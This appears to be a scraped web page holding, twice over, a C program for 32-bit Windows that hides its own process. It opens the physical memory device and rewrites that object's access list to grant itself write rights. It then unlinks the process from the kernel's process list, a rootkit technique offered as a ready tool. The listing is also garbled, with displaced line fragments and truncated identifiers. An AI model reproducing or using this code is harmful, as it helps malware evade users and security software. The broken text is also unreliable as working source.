2024年7月22日发(作者:犹秋巧)
001 #include
002 //#include
003 #include
004
005 typedef LONG NTSTATUS;
006
007 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
008 #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
009 #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
010
011 typedef struct _UNICODE_STRING
012 {
013 USHORT Length;
014 USHORT MaximumLength;
015 PWSTR Buffer;
016 } UNICODE_STRING, *PUNICODE_STRING;
017
018 typedef struct _OBJECT_ATTRIBUTES
019 {
020 ULONG Length;
021 HANDLE RootDirectory;
022 PUNICODE_STRING ObjectName;
023 ULONG Attributes;
024 PVOID SecurityDescriptor;
025 PVOID SecurityQualityOfService;
026 } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
027
028 typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
029 OUT PHANDLE SectionHandle,
030 IN ACCESS_MASK DesiredAccess,
031
032 IN POBJECT_ATTRIBUTES ObjectAttributes
033 );
034
035 typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
036 IN OUT PUNICODE_STRING DestinationString,
037 IN PCWSTR SourceString
038 );
039
040 static bool ishide = false;
041 HANDLE hSection = NULL;
042 PVOID mapPhyMemObject = NULL;
043
044 PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)
045 {
046 ULONG VAddress = (ULONG)address;
047 ULONG PDE,PTE,PAddress;
048 PDE = Base[VAddress>>22];
049 if((PDE&1)==0)
050 return 0;
051 ULONG PageFlage = PDE&0x00000080;
052 if (PageFlage != 0)
053 {
054 //PS位不为零,采用4MB分页方式
055 PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);
056 }
057 else
058 {
059 //PS位为零,采用4kb分页方式
060 PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);
061 PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];
062 if((PTE&1) == 0)
063 return 0;
064 PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);
065 UnmapViewOfFile((PVOID)PDE);
066 }
067 return (PVOID)PAddress;
068 }
069
070 ULONG GetData(PVOID addr)
071 {
072
ddr);
073 PULONG tmp =
(PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&
0xfffff000,0x1000);
074 if(tmp == 0)
075 return 0;
076 ULONG ret = tmp[(phys&0xfff)>>2];
077 UnmapViewOfFile(tmp);
078 return ret;
ULONG phys =
(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a
079 }
080
081 BOOL SetData(PVOID addr, ULONG data)
082 {
083
ddr);
084
);
085 if(tmp == 0)
086 return false;
087 tmp[(phys&0xfff)>>2] = data;
088 UnmapViewOfFile(tmp);
089 return TRUE;
090 }
091
092 void AddACEtoPhyMemObject(HANDLE hSec)
093 {
094 PACL pDacl = NULL;
095 PSECURITY_DESCRIPTOR pSD = NULL;
096 PACL pNewDacl = NULL;
097 GetSecurityInfo(hSec,
098 SE_KERNEL_OBJECT,
099 DACL_SECURITY_INFORMATION,
100 NULL,
101 NULL,
102 &pDacl,
103 NULL,
104 &pSD);
105
106 EXPLICIT_ACCESS ea;
107 RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
108 ea.g**ccessPermissions = SECTION_MAP_WRITE;
109 ea.g**ccessMode = GRANT_ACCESS;
110 eritance= NO_INHERITANCE;
111 eForm = TRUSTEE_IS_NAME;
112 eType = TRUSTEE_IS_USER;
113 ame = "CURRENT_USER";
114
115 SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
PULONG tmp =
(PULONG)MapViewOfFile(hSection,FILE_MAP_WRITE,0,phys&0xfffff000,0x1000
ULONG phys =
(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a
116
117 SetSecurityInfo(hSec,
118 SE_KERNEL_OBJECT,
119 DACL_SECURITY_INFORMATION,
120 NULL,
121 NULL,
122 pNewDacl,
123 NULL);
124
125 if(pSD)
126 LocalFree(pSD);
127 if(pNewDacl)
128 LocalFree(pNewDacl);
129 }
130
131 HANDLE OpenPhyMemObject()
132 {
133 NTSTATUS status;
134 UNICODE_STRING PhyMemObjectString;
135 OBJECT_ATTRIBUTES attributes;
136 ULONG PhyDirAddress = 0x39000;
137
138 HMODULE hNtdll = LoadLibrary("");
139 RTLINITUNICODESTRING RtlInitUnicodeString =
140
(RTLINITUNICODESTRING)GetProcAddress(hNtdll,"RtlInitUnicodeString");
141
RtlInitUnicodeString(&PhyMemObjectString,L"DevicePhysicalMemory");
142
143 = sizeof(OBJECT_ATTRIBUTES);
144 rectory = NULL;
145 Name = &PhyMemObjectString;
146 utes = 0;
147 tyDescriptor = NULL;
148 tyQualityOfService = NULL;
149
150 ZWOPENSECTION ZwOpenSection =
151 (ZWOPENSECTION)GetProcAddress(hNtdll, "ZwOpenSection");
152
153 status =
ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attrib
utes);
154 if(status == STATUS_ACCESS_DENIED)
155 {
156 status =
ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
157 AddACEtoPhyMemObject(hSection);
158 CloseHandle(hSection);
159
utes);
160 }
161 if(!NT_SUCCESS(status))
162 {
163 printf("opensection failed.n");
164 return NULL;
165 }
166
167
x1000);
168 FreeLibrary(hNtdll);
169 return hSection;
170 }
171
172 bool hideprocess(bool hide)
173 {
174 if(!OpenPhyMemObject())
175 {
176 printf("open physical memory failed.n");
177 return false;
178 }
179 ULONG thread = GetData((PVOID)0xffdff124);
180 ULONG process = GetData((PVOID)(thread + 0x44));
181 ULONG flink = GetData((PVOID)(process + 0x88));
182 ULONG blink = GetData((PVOID)(process + 0x8c));
183
184 if(hide == true && ishide == false)
185 {
186 SetData((PVOID)(flink + 4),blink);
187 SetData((PVOID)(blink),flink);
188 }
mapPhyMemObject =
MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,PhyDirAddress,0
status =
ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attrib
189 if(hide == false && ishide == true)
190 {
191 //unhide()
192 }
193 return true;
194 }
195
196 int main()
197 {
198 char ch;
199 bool bExit = false;
200 bool bRet;
201
202 while(!bExit)
203 {
204 printf("h to hidenu to unhidene to exitn");
205 ch = getchar();
206 getchar();
207 switch(ch)
208 {
209 case 'h':
210 if(ishide == true)
211 {
212 printf("the process is already hiden.n");
213 break;
214 }
215 bRet = hideprocess(true);
216 if(bRet)
217 {
218 printf("hide successfully.n");
219 ishide = true;
220 }
221 else
222 printf("hide failed.n");
223 break;
224 case 'u':
225 if(ishide == false)
226 {
227 printf("the process is not hiden.n");
228 break;
229 }
230 bRet = hideprocess(false);
231 if(bRet)
232 {
233 printf("unhide successfully.n");
234 ishide = false;
235 }
236 else
237 printf("unhide failed.n");
238 break;
239 case 'e':
240 bExit = true;
241 break;
242 default:
243 printf("unknown command.n");
244 break;
245 }
246 }
247
248 return 0;
249 }
2024年7月22日发(作者:犹秋巧)
001 #include
002 //#include
003 #include
004
005 typedef LONG NTSTATUS;
006
007 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
008 #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
009 #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
010
011 typedef struct _UNICODE_STRING
012 {
013 USHORT Length;
014 USHORT MaximumLength;
015 PWSTR Buffer;
016 } UNICODE_STRING, *PUNICODE_STRING;
017
018 typedef struct _OBJECT_ATTRIBUTES
019 {
020 ULONG Length;
021 HANDLE RootDirectory;
022 PUNICODE_STRING ObjectName;
023 ULONG Attributes;
024 PVOID SecurityDescriptor;
025 PVOID SecurityQualityOfService;
026 } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
027
028 typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
029 OUT PHANDLE SectionHandle,
030 IN ACCESS_MASK DesiredAccess,
031
032 IN POBJECT_ATTRIBUTES ObjectAttributes
033 );
034
035 typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
036 IN OUT PUNICODE_STRING DestinationString,
037 IN PCWSTR SourceString
038 );
039
040 static bool ishide = false;
041 HANDLE hSection = NULL;
042 PVOID mapPhyMemObject = NULL;
043
044 PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)
045 {
046 ULONG VAddress = (ULONG)address;
047 ULONG PDE,PTE,PAddress;
048 PDE = Base[VAddress>>22];
049 if((PDE&1)==0)
050 return 0;
051 ULONG PageFlage = PDE&0x00000080;
052 if (PageFlage != 0)
053 {
054 //PS位不为零,采用4MB分页方式
055 PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);
056 }
057 else
058 {
059 //PS位为零,采用4kb分页方式
060 PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);
061 PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];
062 if((PTE&1) == 0)
063 return 0;
064 PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);
065 UnmapViewOfFile((PVOID)PDE);
066 }
067 return (PVOID)PAddress;
068 }
069
070 ULONG GetData(PVOID addr)
071 {
072
ddr);
073 PULONG tmp =
(PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&
0xfffff000,0x1000);
074 if(tmp == 0)
075 return 0;
076 ULONG ret = tmp[(phys&0xfff)>>2];
077 UnmapViewOfFile(tmp);
078 return ret;
ULONG phys =
(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a
079 }
080
081 BOOL SetData(PVOID addr, ULONG data)
082 {
083
ddr);
084
);
085 if(tmp == 0)
086 return false;
087 tmp[(phys&0xfff)>>2] = data;
088 UnmapViewOfFile(tmp);
089 return TRUE;
090 }
091
092 void AddACEtoPhyMemObject(HANDLE hSec)
093 {
094 PACL pDacl = NULL;
095 PSECURITY_DESCRIPTOR pSD = NULL;
096 PACL pNewDacl = NULL;
097 GetSecurityInfo(hSec,
098 SE_KERNEL_OBJECT,
099 DACL_SECURITY_INFORMATION,
100 NULL,
101 NULL,
102 &pDacl,
103 NULL,
104 &pSD);
105
106 EXPLICIT_ACCESS ea;
107 RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
108 ea.g**ccessPermissions = SECTION_MAP_WRITE;
109 ea.g**ccessMode = GRANT_ACCESS;
110 eritance= NO_INHERITANCE;
111 eForm = TRUSTEE_IS_NAME;
112 eType = TRUSTEE_IS_USER;
113 ame = "CURRENT_USER";
114
115 SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
PULONG tmp =
(PULONG)MapViewOfFile(hSection,FILE_MAP_WRITE,0,phys&0xfffff000,0x1000
ULONG phys =
(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a
116
117 SetSecurityInfo(hSec,
118 SE_KERNEL_OBJECT,
119 DACL_SECURITY_INFORMATION,
120 NULL,
121 NULL,
122 pNewDacl,
123 NULL);
124
125 if(pSD)
126 LocalFree(pSD);
127 if(pNewDacl)
128 LocalFree(pNewDacl);
129 }
130
131 HANDLE OpenPhyMemObject()
132 {
133 NTSTATUS status;
134 UNICODE_STRING PhyMemObjectString;
135 OBJECT_ATTRIBUTES attributes;
136 ULONG PhyDirAddress = 0x39000;
137
138 HMODULE hNtdll = LoadLibrary("");
139 RTLINITUNICODESTRING RtlInitUnicodeString =
140
(RTLINITUNICODESTRING)GetProcAddress(hNtdll,"RtlInitUnicodeString");
141
RtlInitUnicodeString(&PhyMemObjectString,L"DevicePhysicalMemory");
142
143 = sizeof(OBJECT_ATTRIBUTES);
144 rectory = NULL;
145 Name = &PhyMemObjectString;
146 utes = 0;
147 tyDescriptor = NULL;
148 tyQualityOfService = NULL;
149
150 ZWOPENSECTION ZwOpenSection =
151 (ZWOPENSECTION)GetProcAddress(hNtdll, "ZwOpenSection");
152
153 status =
ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attrib
utes);
154 if(status == STATUS_ACCESS_DENIED)
155 {
156 status =
ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
157 AddACEtoPhyMemObject(hSection);
158 CloseHandle(hSection);
159
utes);
160 }
161 if(!NT_SUCCESS(status))
162 {
163 printf("opensection failed.n");
164 return NULL;
165 }
166
167
x1000);
168 FreeLibrary(hNtdll);
169 return hSection;
170 }
171
172 bool hideprocess(bool hide)
173 {
174 if(!OpenPhyMemObject())
175 {
176 printf("open physical memory failed.n");
177 return false;
178 }
179 ULONG thread = GetData((PVOID)0xffdff124);
180 ULONG process = GetData((PVOID)(thread + 0x44));
181 ULONG flink = GetData((PVOID)(process + 0x88));
182 ULONG blink = GetData((PVOID)(process + 0x8c));
183
184 if(hide == true && ishide == false)
185 {
186 SetData((PVOID)(flink + 4),blink);
187 SetData((PVOID)(blink),flink);
188 }
mapPhyMemObject =
MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,PhyDirAddress,0
status =
ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attrib
189 if(hide == false && ishide == true)
190 {
191 //unhide()
192 }
193 return true;
194 }
195
196 int main()
197 {
198 char ch;
199 bool bExit = false;
200 bool bRet;
201
202 while(!bExit)
203 {
204 printf("h to hidenu to unhidene to exitn");
205 ch = getchar();
206 getchar();
207 switch(ch)
208 {
209 case 'h':
210 if(ishide == true)
211 {
212 printf("the process is already hiden.n");
213 break;
214 }
215 bRet = hideprocess(true);
216 if(bRet)
217 {
218 printf("hide successfully.n");
219 ishide = true;
220 }
221 else
222 printf("hide failed.n");
223 break;
224 case 'u':
225 if(ishide == false)
226 {
227 printf("the process is not hiden.n");
228 break;
229 }
230 bRet = hideprocess(false);
231 if(bRet)
232 {
233 printf("unhide successfully.n");
234 ishide = false;
235 }
236 else
237 printf("unhide failed.n");
238 break;
239 case 'e':
240 bExit = true;
241 break;
242 default:
243 printf("unknown command.n");
244 break;
245 }
246 }
247
248 return 0;
249 }